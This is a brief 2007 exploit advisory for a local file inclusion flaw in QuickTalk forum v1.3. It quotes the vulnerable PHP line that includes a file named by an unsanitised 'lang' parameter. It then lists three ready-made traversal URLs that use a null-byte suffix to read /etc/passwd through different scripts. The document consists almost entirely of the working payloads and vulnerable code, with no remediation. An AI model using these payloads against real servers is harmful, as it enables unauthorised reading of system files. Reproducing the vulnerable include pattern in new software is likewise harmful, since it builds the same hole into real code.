quicktalk-lfi.txt
Posted on 28 June 2007
###QuickTalk forum v1.3 Local File Inclusion### #download: http://www.qt-cute.org/download/qtf13.zip #found by: katatafish (karatatata@hush.com) #vulncode: $strLang = $_GET["lang"]; include("language/$strLang/qtf_lang_reg.inc"); #exploits: http://www.site.com/[path]/qtf_checkname.php?lang=./../../../../../../../../../../etc/passwd%00 http://www.site.com/[path]/qtf_j_birth.php?lang=./../../../../../../../../../../etc/passwd%00 http://www.site.com/[path]/qtf_j_exists.php?lang=./../../../../../../../../../../etc/passwd%00 #thanks:str0ke